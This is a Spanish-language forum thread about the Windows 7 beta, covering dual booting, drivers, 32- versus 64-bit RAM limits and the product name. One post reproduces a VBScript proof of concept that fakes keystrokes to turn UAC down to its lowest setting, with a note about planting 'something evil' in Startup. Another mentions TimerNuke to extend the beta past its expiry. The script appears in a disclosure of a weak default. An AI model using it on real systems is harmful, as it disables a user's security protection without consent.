windows 7, fotos, impresiones

TRHiLL escribió:
PS2HACKER escribió:
TRHiLL escribió:Buenas, soy un poco "manazas" en cuanto a software se refiere, tengo actualmente el vista Sp1 y me gustaria saber si puedo hacer una particion nueva en HDD para instalar el 7..
mi pregunta es.. Vista permite una particion con otro windows instalado?? no se pq tengo la cosa en la cabeza de que no se puede.. Si se puede, es posible sin tener k formatear el windows k tengo instalado?

si, se puede.

1º haz 1 particion e instala ahi W7 y cuando lo tengas instalado ya te deja elegir entre w7 y vista.

La particion como lo hago?? algun programa externo o directamente con el instalador del W7? pq recuerdo que con el instaldor de Xp juraria que se podia hacer :S

http://www.partition-tool.com/download.htm
me he bajao ese programa pero no me deja instalarlo al tener yo el SO de 64 bits.. me he bajado el partition magic.. pero debo de ser muy lerdo pq no tengo pelotas a hacer una particion [buuuaaaa]
TRHiLL escribió:me he bajao ese programa pero no me deja instalarlo al tener yo el SO de 64 bits.. me he bajado el partition magic.. pero debo de ser muy lerdo pq no tengo pelotas a hacer una particion [buuuaaaa]

Pues a mi me va en 64bits
Joe pues vaya a mi me saltaba un error diciendo que no funcionaba en 64 bits :S
TRHiLL escribió:Joe pues vaya a mi me saltaba un error diciendo que no funcionaba en 64 bits :S

Porque has bajado la versión Home gratuita de 32 bits.

PS2HACKER tendrá la versión Professional o Server (pirata o demo, él sabrá xD).
Razorblade escribió:
PS2HACKER tendrá la versión Professional o Server (pirata o demo, él sabrá xD).

Moderate colega e intenta ayudarle en vez de decir cosas que no sabes sino mejor ni posteas pq no es la primera vez q te veo decir cosas de este tipo.
Parece que das por echo q todos somos piratas y deberias mirarte en el espejo me parece a mi y si quieres discutir mi mp te esta esperando.

TRHILL, la demo tb funciona para particionar.

saludos
PS2HACKER escribió:deberias mirarte en el espejo me parece a mi y si quieres discutir mi mp te esta esperando.

?¿ Sí, yo soy un pirata, ¿tienes algún problema? No sé qué tengo que discutir contigo.

Creo que decir que la versión gratuita no funciona en 64 bits ha sido de MUCHA ayuda, ya que ni tú ni él os habíais percatado. Así que ya que te pones borde hasta me lo tendrías que agradecer.
Y sí, me juego lo que quieras a que precisamente por eso no lo has comprado. Lo doy por hecho, ¿y qué? ¿Se acaba el mundo por eso? ¿Para tu religión es tal la ofensa que ahora debes matarme? ;)

¿A qué te refieres con que no es la primera vez que digo cosas de ese tipo? ¿De que igual tienes algún software sin licencia?
Bueno, si eso ya que lo has dicho, respóndeme por MP para que no nos pongamos a 'ensuciar' el tema del foro.
¿Hay algún firewall gratuíto q vaya bien con la versión de 64 bits?.

Salu2
alguien ha logrado instalar los drivers compatibles de la gráfica?

porque he echo una máquina virtual para probar Windows 7 con el VMWare y claro no puedo utilizar el aero... y si intento instalar los drivers del vista evidentemente me dice que no son compatibles...

Tengo una Geforce 8800GT haber si la tiene alguno o me decís que hacer...

Gracias!

Un saludo!
Razorblade escribió:
PS2HACKER escribió:deberias mirarte en el espejo me parece a mi y si quieres discutir mi mp te esta esperando.

?¿ Sí, yo soy un pirata, ¿tienes algún problema? No sé qué tengo que discutir contigo.

Hombre, la verdad es que el paréntesis ese sobraba eh, no venía ni a cuento ni ná xDDD
mmdd escribió:alguien ha logrado instalar los drivers compatibles de la gráfica?

porque he echo una máquina virtual para probar Windows 7 con el VMWare y claro no puedo utilizar el aero... y si intento instalar los drivers del vista evidentemente me dice que no son compatibles...

Tengo una Geforce 8800GT haber si la tiene alguno o me decís que hacer...

Pero a ver que no te pillo... ¿Se supone que estás intentado instalar los drivers de tu gráfica real, en una máquina virtual? ¬_¬

KPY escribió:Hombre, la verdad es que el paréntesis ese sobraba eh, no venía ni a cuento ni ná xDDD

Venga va, la próxima vez intentaré no herir sensibilidades y ahorrar las palabras que pueda, que a veces se me olvida la hipocresía que hay.
Ahora pasaré a recoger mi pin de niño malo.
EWGF está baneado por "Clon de usuario baneado"
Razorblade escribió:?¿ Sí, yo soy un pirata, ¿tienes algún problema?

Do what you want 'cause a pirate is free, you are a pirate!

[/offtopic]
Grande, Windows 7 es grande, estoy alucinando con la estabilidad y retrocompatibilidad del sistema, y para los que aun no lo sepan, hay un build de kaspersky gratis durante 3 meses en su propia página. Lo digo porque siguen entrando y afectando virus, exactamente los mismos que en WinVista.

Ni que decir tengo que funciona a las mil maravillas en un Acer Aspire One. Habiendo instalado el TimerNuke... me veo capaz de quedarme con la beta hasta que saquen el proximo Windows.
EWGF escribió:
Razorblade escribió:?¿ Sí, yo soy un pirata, ¿tienes algún problema?

Do what you want 'cause a pirate is free, you are a pirate!

[/offtopic]
Grande, Windows 7 es grande, estoy alucinando con la estabilidad y retrocompatibilidad del sistema, y para los que aun no lo sepan, hay un build de kaspersky gratis durante 3 meses en su propia página. Lo digo porque siguen entrando y afectando virus, exactamente los mismos que en WinVista.

Ni que decir tengo que funciona a las mil maravillas en un Acer Aspire One. Habiendo instalado el TimerNuke... me veo capaz de quedarme con la beta hasta que saquen el proximo Windows.

No hace falta usar timer nuke, puedes pedir el serial legalmente en la web de MS [oki] pero ya no se si se puede hacer aunque he leido q iban alargar el plazo hasta Febrero.

saludos
Si no instalo TimerNuke, Windows me dejará de funcionar cuando le toque. Si lo instalo, puedo tirar con la beta hasta que quiera.
Bueno, debido a múltiples fallos "inexplicables" he formateado y he vuelto al Vista64. No me termina de convencer en algunos aspectos la BETA, pero tienen tiempo de depurarla más a fondo. De momento, creo que paso de meterle nada más que sea BETA a mi pc XD
Bueno, pues resulta que al poner la protección UAC con distintos niveles, y por defecto en uno bajo, Microsoft la ha cagado (de cara a la seguridad).
Con esto todos los usuarios están super-contentos de que 7 no pida tanto permisos como hace Vista (ay, es que asín se parece más al XP), pero sin darse cuenta de que así no sirve de nada esa protección (será también porque en el XP no existe).

Al no pedir por defecto permisos, un simple script como éste puede desactivar por completo el UAC:
'// 1337H4x Written by _____________
'//                    (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"

Hay que guardarlo como texto, pero con extensión .vbs. Ojo, que reinicia la máquina.

De momento, la única manera de estar protegidos es poniendo el UAC en el nivel alto, a modo de Vista.
Cuando hicieron esos cambios en UAC, muchos nos preguntábamos cómo se las habían apañado para diferenciar cuando era un usuario realizando los cambios de cuándo éstos se originan desde un programa. Parece que simplemente, no lo han hecho.

Y viendo que en realidad ese script únicamente simula pulsaciones de teclado, en realidad cualquier ajuste de Windows podría ser alterado de forma similar desde un programa, no sólo UAC, sin más que variar la secuencia de pulsaciones, y es algo con lo que cualquiera puede jugar y se puede probar de forma muy sencilla.

En resumen: que en 7, y salvo que cambien las cosas, usar una cuenta de administrador con el ajuste de UAC por defecto es menos seguro de lo que es por defecto en Vista.

Personalmente tengo claro que si cambio a 7, poner UAC como ahora lo está en Vista será lo primero que haga.

La fuente original donde yo lo leí:

http://www.istartedsomething.com/200901 ... eta-proof/

Y la respuesta de Microsoft:

http://www.istartedsomething.com/200901 ... -by-design
A mi me parece igual que Vista, de todas formas epserare a probarlo.
Razorblade escribió:
KPY escribió:Hombre, la verdad es que el paréntesis ese sobraba eh, no venía ni a cuento ni ná xDDD

Venga va, la próxima vez intentaré no herir sensibilidades y ahorrar las palabras que pueda, que a veces se me olvida la hipocresía que hay.

¿Hipocresía? ¿Tú qué cojones sabes de esa persona de lo que tenga o deje de tener? Lo que quería decir es que la puntilla esa de "bueno, seguramente lo tenga pirata", que es lo que claramente querías decir, sobraba. No venía a cuento. Se habla de un programa, punto. No de si se tiene licencia o no, o si se lo ha bajado de Mininova o Thepiratebay.

Que aquí no estamos con el timo de "los backups" de otros sitios, aquí estamos usando programas. El resto son divagaciones tuyas, y personalmente, no me gustaría que se divagase sobre si lo tengo original o pirata, por que de eso no se está tratando aquí.
episode96 escribió:Y viendo que en realidad ese script únicamente simula pulsaciones de teclado, en realidad cualquier ajuste de Windows podría ser alterado de forma similar desde un programa, no sólo UAC, sin más que variar la secuencia de pulsaciones, y es algo con lo que cualquiera puede jugar y se puede probar de forma muy sencilla.

Claro, ese es el pez que se muerde la cola. Si el UAC es para evitar que un script pueda hacer cambios en el sistema, pero lo tenemos en un nivel tan bajo para que "no moleste" pero que un script puede desactivarlo.... xD

Pero vamos, normal la actitud de Microsoft, yo también haría lo mismo:
Si lo ponemos en nivel alto de protección, se quejan de que molesta, si lo ponemos en nivel bajo, se quejan de que no protege tanto. ¡Anda y que les den ya! xD

Aunque no creo que les costase tanto implementar que los cambios del UAC sólo se puedan hacer "a mano", lo que habías dicho al principio.

KPY escribió:¿Hipocresía? ¿Tú qué cojones sabes

Deja tus cojones tranquilos KPY no te los irrites, que ya he recogido el pin. xD

Básicamente es que puedo decir lo que quiera, como todos, mientras no se falte al respeto. Si quiero decir porque lo considero dentro del contexto que tú sabrás si tienes un perro o un gato, o si eres alcohólico o no, lo digo. ;)

Precisamente el "tú sabrás si" quiere decir que yo no lo sé, así que si eso no lo entiendes o lo mal-entiendes (y es lo que has dicho)... mala cosa por ti más que nada.
Razorblade escribió:
episode96 escribió:Y viendo que en realidad ese script únicamente simula pulsaciones de teclado, en realidad cualquier ajuste de Windows podría ser alterado de forma similar desde un programa, no sólo UAC, sin más que variar la secuencia de pulsaciones, y es algo con lo que cualquiera puede jugar y se puede probar de forma muy sencilla.

Claro, ese es el pez que se muerde la cola. Si el UAC es para evitar que un script pueda hacer cambios en el sistema, pero lo tenemos en un nivel tan bajo para que "no moleste" pero que un script puede desactivarlo.... xD

Pero vamos, normal la actitud de Microsoft, yo también haría lo mismo:
Si lo ponemos en nivel alto de protección, se quejan de que molesta, si lo ponemos en nivel bajo, se quejan de que no protege tanto. ¡Anda y que les den ya! xD

Aunque no creo que les costase tanto implementar que los cambios del UAC sólo se puedan hacer "a mano", lo que habías dicho al principio.

KPY escribió:¿Hipocresía? ¿Tú qué cojones sabes

Deja tus cojones tranquilos KPY no te los irrites, que ya he recogido el pin. xD

Básicamente es que puedo decir lo que quiera, como todos, mientras no se falte al respeto. Si quiero decir que tú sabrás si tienes un perro o un gato, o si eres alcohólico o no, lo digo. ;)

Precisamente el "tú sabrás si" quiere decir que yo no lo sé, así que si eso no lo entiendes... mala cosa.

Basicamente hasta que llegue el dia que te banean pq educacion tienes poca por lo que muestras y eres el primero en EOL desde 2001 que hace comentarios de este tipo sin venir a cuento.

Lo primero es q el usuario me preguntó a mi y no a ti asi que no respondas por los demas que no es la primera vez que lo haces.

Si quieres responder dile un programa alternativo pero no respondas por los demas y menos a liarla con tus frases tipicas.
PS2HACKER escribió:Basicamente hasta que llegue el dia que te banean pq educacion tienes poca por lo que muestras y eres el primero en EOL desde 2001 que hace comentarios de este tipo sin venir a cuento.

Lo primero es q el usuario me preguntó a mi y no a ti asi que no respondas por los demas que no es la primera vez que lo haces.

Si quieres responder dile un programa alternativo pero no respondas por los demas y menos a liarla con tus frases tipicas.

Creo que tenéis una incorrecta acepción de lo que es faltar al respeto, así que cuidado no os baneen a vosotros algún día con vuestra mala educación y vuestros cojones.

Aquí no pregunta un usuario y el que primero responde es el que tiene DERECHO a continuar la conversación exclusivamente. Creo que entonces tampoco entiendes lo que es un FORO.

;)

Si tienes/tenéis algo más que decirme, usa si eso los privados como dijiste.
Y si eso evitad DARME ÓRDENES, PORQUE ESO SÍ ES UNA FALTA DE RESPETO.
STICK TO THE TOPIC FAGS!!!

Y las discusiones, por MP.
Volviendo al tema:
Se esta comentando que la RC(Release Candidate) podria estar para principios de del mes de abril.

Michael Bohlin (Gerente de productos de Microsoft) dice que todas las oficinas internas apuntan como fecha de salida de la RTM para el 3 de octubre.

Se rumorea que Microsoft podría estar preparando otra Build para testearla para el mes que viene.

Saludos.
¿los que habeis probado la beta de 32 bits y teneis 4GB de ram o más os la coge?
¿o le pasa como a xp que te pilla 3.25gb ram?
mithra escribió:¿los que habeis probado la beta de 32 bits y teneis 4GB de ram o más os la coge?

La coge enterita, o por lo menos eso pone en las propiedades de Computer ;)
mithra escribió:¿los que habeis probado la beta de 32 bits y teneis 4GB de ram o más os la coge?

No es cuestión de 7 o XP, es puramente limitación de los 32 bits.

¿O con 'coger' simplemente te refieres a que MUESTRE que hay 4GB aunque casi 1GB no se pueda utilizar? Entonces sí, como dice Jonri, la "coge".
sobre el UAC; realmente importa? yo lo primero que hago en Vista es desactivarlo... y oye, ningun problema xD es mas, mi raton me lo agradece XD
ZeusII escribió:sobre el UAC; realmente importa? yo lo primero que hago en Vista es desactivarlo... y oye, ningun problema xD es mas, mi raton me lo agradece XD

yo tb es lo primero que hago y, "el trauma" desaparece.

no sé si windows 7 en su versión de 32 bits usará 4GB como máximo o se limitará a menos como windows xp 32 bits.
en ese caso espero que la versión de 64 bits sea buena.
Por eso mismo deberían haber dejado UAC como estaba en Vista. Así quien quisiera lo habría desactivado sin más como iban a hacer de todos modos y se habrían ahorrado la farsa de decir que ahora UAC es "menos molesto" cuando en realidad lo que pasa es que ahora está roto.
episode96 escribió:Por eso mismo deberían haber dejado UAC como estaba en Vista. Así quien quisiera lo habría desactivado sin más como iban a hacer de todos modos y se habrían ahorrado la farsa de decir que ahora UAC es "menos molesto" cuando en realidad lo que pasa es que ahora está roto.

Lo q deberian hacer es dejarlo como en vista y dejar facil y acceso como en 7 por ejemplo pq a mi no me molesta desactivarlo pero para acceder a él y encontrarlo tengo dar 2intentos pq una persona q no instala todos los dias vista pues siempre me olvido dnd es exactamente y eso es un rollo.
PS2HACKER escribió:
episode96 escribió:Por eso mismo deberían haber dejado UAC como estaba en Vista. Así quien quisiera lo habría desactivado sin más como iban a hacer de todos modos y se habrían ahorrado la farsa de decir que ahora UAC es "menos molesto" cuando en realidad lo que pasa es que ahora está roto.

Lo q deberian hacer es dejarlo como en vista y dejar facil y acceso como en 7 por ejemplo pq a mi no me molesta desactivarlo pero para acceder a él y encontrarlo tengo dar 2intentos pq una persona q no instala todos los dias vista pues siempre me olvido dnd es exactamente y eso es un rollo.

pse, si algo bueno tiene vista es la busqueda... yo solo escribo "user account control" en el buscador dentro del panel de control y ya me sale la opcion (que esta en cuentas de usuario) -nota: uso vista en ingles

mithra escribió:no sé si windows 7 en su versión de 32 bits usará 4GB como máximo o se limitará a menos como windows xp 32 bits.

w7 de 32 bits sera como vista, max 4gb de los cuales no se aprovechan todos, es una limitacion de los 32 bits.

con la edicion de 64b sera lo mismo pero seguramente mas fluida y estable, a parte de soportar cuanta ram quieras meterla. El vista x64 es una gozada, yo he dado el salto hace un par de dias y estoy muy contento de la mejora ^^ /piensa que vista x64 no tiene nada que ver con la mierda de xp x64, que era incompatible con todo xD... solo llegue a usarlo un par de semanas por esa razon/
ZeusII escribió:pse, si algo bueno tiene vista es la busqueda... yo solo escribo "user account control" en el buscador dentro del panel de control y ya me sale la opcion (que esta en cuentas de usuario) -nota: uso vista en ingles

Ya pero pero si esta + a mano mejor. Tal como esta en 7 me conformo. :)
ZeusII escribió:
PS2HACKER escribió:

pse, si algo bueno tiene vista es la busqueda... yo solo escribo "user account control" en el buscador dentro del panel de control y ya me sale la opcion (que esta en cuentas de usuario) -nota: uso vista en ingles

mithra escribió:no sé si windows 7 en su versión de 32 bits usará 4GB como máximo o se limitará a menos como windows xp 32 bits.

w7 de 32 bits sera como vista, max 4gb de los cuales no se aprovechan todos, es una limitacion de los 32 bits.

con la edicion de 64b sera lo mismo pero seguramente mas fluida y estable, a parte de soportar cuanta ram quieras meterla. El vista x64 es una gozada, yo he dado el salto hace un par de dias y estoy muy contento de la mejora ^^ /piensa que vista x64 no tiene nada que ver con la mierda de xp x64, que era incompatible con todo xD... solo llegue a usarlo un par de semanas por esa razon/

yo uso vista 64 bits desde hace unos dos/tres meses y estoy muy contento. podría consumir menos ram, pero no me quejo.
hasta que salga windows 7 64 bits vista cumple bien.

en cuanto al post ya no lo dudo. seguiré con 64 bits en 7.
hombre, pero la ram esta para usarla, cosa que vista hace respecto xp y tiene sus ventajas.

eso si, esto no quita que en w7 la gestion y uso de la misma haya mejorado, sobretodo en equipos con menos de 1GB.
¿los que habeis probado la beta habeis tenido problemas con juegos para xp?
me refiero a que siga siendo compatible con juegos y programas.
mithra escribió:¿los que habeis probado la beta habeis tenido problemas con juegos para xp?
me refiero a que siga siendo compatible con juegos y programas.

Macho un post de ochenta y tantas paginas podias echarle un vistazo,seguro que encuentras las respuestas.
Buenas, me ha surgido un problema con la beta esta. Veréis, tengo instalado el xp64 y después instalé la beta. Todo perfecto, al arrancar me salía el menú para escoger entre los dos sistemas y podía elegir una opción de Windows 7 para pasarse por el forro que los drivers no estén certificados y así poder utilizar mi módem y tener acceso a internet. El caso es que Nuendo me daba problemas en xp64 (más bien que no sonaba por asio), así que tuve que instalar después el xp x86. Pero el hijodeputa me mete el menú de boot antiguo y no es que no pueda elegir opciones de w7, esque sólo me salen los XP en el menú. He intentado editar a mano el boot.ini y poner la partición (2) donde supongo que estará el w7, pero no sé si es que no es esa partición o que con ese boot no lo puedo arrancar, pero al elegir la opción se reinicia de nuevo sin avisar y vuelve al mismo menú de boot. Me gustaría poder utilizar de nuevo mi instalación de Windows 7 ya que ya tenía configuradas e instaladas varias cosas, y tener que reinstalarlo todo sería un coñazo, la verdad, debe haber otra solución. ¿Alguna sugerencia? Estoy bastante perdido, se agradece cualquier sugerencia al respecto, gracias por adelantado.

Por cierto, nunca utilicé Vista, pero el 7 me parece (al menos esta beta) que va de puta madre. Me instaló casi todos los drivers él solito al arrancar, tira muy rápido el shell y las carpetas con imágenes me las muestra al instante con thumbnails... me perdí un poco para compartir la conexión a internet pero lo conseguí y realmente es fácil e intuitivo hacerlo... al principio choca la barra de tareas sin texto (sólo los iconos que a veces no distingues), pero luego su usabilidad es buena enseguida... me gusta y posiblemente me cambie si sigue rulando igual de bien. Casques aún no he tenido, salvo uno de IE8 que se arregló matándolo y volviéndolo a lanzar.

Saludos.
ZeusII escribió:w7 de 32 bits sera como vista, max 4gb de los cuales no se aprovechan todos, es una limitacion de los 32 bits.

Desde XP se da soporte hasta 4GB de memoria, independientemente de que el SO sea de 32 o de 64, el SO se reserva para él lo que no se ve (y no lo muestra) y el resto se usa como ram normal.
bueno tengo pensado instalarme la beta de windos 7 antes de k dejen de poder permitir la descarga que ya queda poco ,pero tengo unas dudas :

*hay alguna manera de instalar windows 7 ,pero sin tocar el sistema operativo actual,de manera que cuando enciendas el pc este en vista y mediante algo poder acceder a windows 7 .
*sabeis si windows 7 da problemas en lo referente a drivers etc...?

bueno pues esas son mis dudas principales
Drivers funcionan los mismos q en vista sin problemas.

Llevo probando la beta unas 3-4 semanas y he de decir q estoy encantando, una gran mejora con respecto al vista, de hecho si tuviera q poner el vista me volvia al XP.
Grotaron escribió:Drivers funcionan los mismos q en vista sin problemas.

Llevo probando la beta unas 3-4 semanas y he de decir q estoy encantando, una gran mejora con respecto al vista, de hecho si tuviera q poner el vista me volvia al XP.

gracias .

ahora solo me queda que me digan si exite la psobilidad de instalar windows 7 ,pero sin tocar el sistema operativo actual,de manera que cuando enciendas el pc este en vista y mediante algo poder acceder a windows 7 .
xals_punk escribió:
Grotaron escribió:Drivers funcionan los mismos q en vista sin problemas.

gracias .

ahora solo me queda que me digan si exite la psobilidad de instalar windows 7 ,pero sin tocar el sistema operativo actual,de manera que cuando enciendas el pc este en vista y mediante algo poder acceder a windows 7 .

Crea una nueva particion.
------------------------
Lo que no me gusta (segun he visto en las fotos) es la barra de inicio,me gusta mas la del vista.
KPY escribió:
ZeusII escribió:w7 de 32 bits sera como vista, max 4gb de los cuales no se aprovechan todos, es una limitacion de los 32 bits.

Desde XP se da soporte hasta 4GB de memoria, independientemente de que el SO sea de 32 o de 64, el SO se reserva para él lo que no se ve (y no lo muestra) y el resto se usa como ram normal.

Muy falso.
La limitación de los 32 bits hace que sólo se disponga de unos 3,1GB en vez de 4GB. No se reserva nada para el SO, simplemente éste no tiene forma física de acceder a él:
http://sigt.net/archivo/los-4gb-de-ram- ... dows.xhtml

Y si no, que pasa con la versión de 64 bits que si muestra 4GB? No necesita reservar RAM y la versión de 32 bits si? Es que no tiene ni pies ni cabeza.
Una preguntita que nose si se habra comentado ya por aqui..

Se sabe si el nombre definitivo es Windows 7? O es como con Longhorn.. Porque si no cuanta originalidad.. [+risas]

saludoss
kurras escribió:Una preguntita que nose si se habra comentado ya por aqui..

Se sabe si el nombre definitivo es Windows 7? O es como con Longhorn.. Porque si no cuanta originalidad.. [+risas]

saludoss

Windows 7 o se7en, creo que son los definitivos, ya que han sacado los nombres de las ediciones y pone la primera...
toni_v escribió:
kurras escribió:Una preguntita que nose si se habra comentado ya por aqui..

saludoss

Windows 7 o se7en, creo que son los definitivos, ya que han sacado los nombres de las ediciones y pone la primera...

Gracias!

En todo caso espero que solucione los supuestos problemas que tiene el Vista (que dejando a un lado que es un poco lento a mi me va de perlas.. ), porque lo que es diseño y el nombre se han lucido.. El diseño es identico al Vista y con el nombre..un poco mas y les da dolor de cabeza con tanto pensar.. xD

saludoss
X86 está baneado por "Clon de usuario baneado"
Pues yo creo que en diseño supera por mucho al Vista. Y el nombre es genial, a mi entender. Simple y numérico.
Pues que quereis que os diga, ¡a mi también me gusta el nombre! XD
el diseño..., pues es un vista retocadito y ya, eso si, la barra de tareas (Inicio----Reloj) es muuuy util, sobre todo si la usas bien ;)

El nombre no esta mal... pero donde se ponga algo como los de apple:

Leopard
Panther
Tiger

O distros de linux:

Ubuntu
Fedora
Mandriva
Debian

Que quereis que os diga, intimidan mas, sobre todo los felinos de apple, y la cabra de ubuntu tambien... [carcajad]
3391 respuestas